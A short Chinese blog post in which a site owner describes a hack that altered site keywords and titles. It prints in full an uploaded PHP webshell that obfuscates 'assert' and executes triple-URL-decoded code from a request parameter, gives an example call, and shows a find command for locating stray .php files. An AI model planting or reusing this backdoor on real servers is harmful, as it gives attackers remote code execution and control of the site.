有很多網站被黑,導致網站關鍵詞 網站標題 被修改,更可惡的是你如果發現的晚,關鍵詞都被收錄進去了,搞得很麻煩。
這是被上傳的php文件之一,
<?php $poc ="axsxsxexrxt";$poc_1 = explode("x", $poc); $poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['guest']))));?>
這串代碼,只要在url參數中輸入 任意轉碼之後的代碼 都可以執行,如 域名/config.cache.php?guest=echo ‘hi’;
如果你網站沒有把靜態資源做到靜態雲存儲裏面去,那麼你的麻煩可大了…
如果你網站中存放靜態資源的目錄裏面,文件夾繁多,那麼久難找出這些木馬文件,但是有一串代碼可以查找出目錄下所有的.php文件。
首先 ssh連接服務器,轉到root用戶,
然後CD到項目目錄
cd /www/wwwroot/xxx/public
再查找
find . -type f -regex ".*\.php"
結果如下
最好你最好檢查下網站是否有上傳漏洞之類的…
其它的措施不清楚,第一次被搞,然後不需要的端口關閉掉,如果有好的辦法請告知我,,我自己的博客最近存在這樣的問題,也不知道是不是上述方法,能夠徹底的防範,諸位大神如果有辦法,請務必留言我,讓我整一整…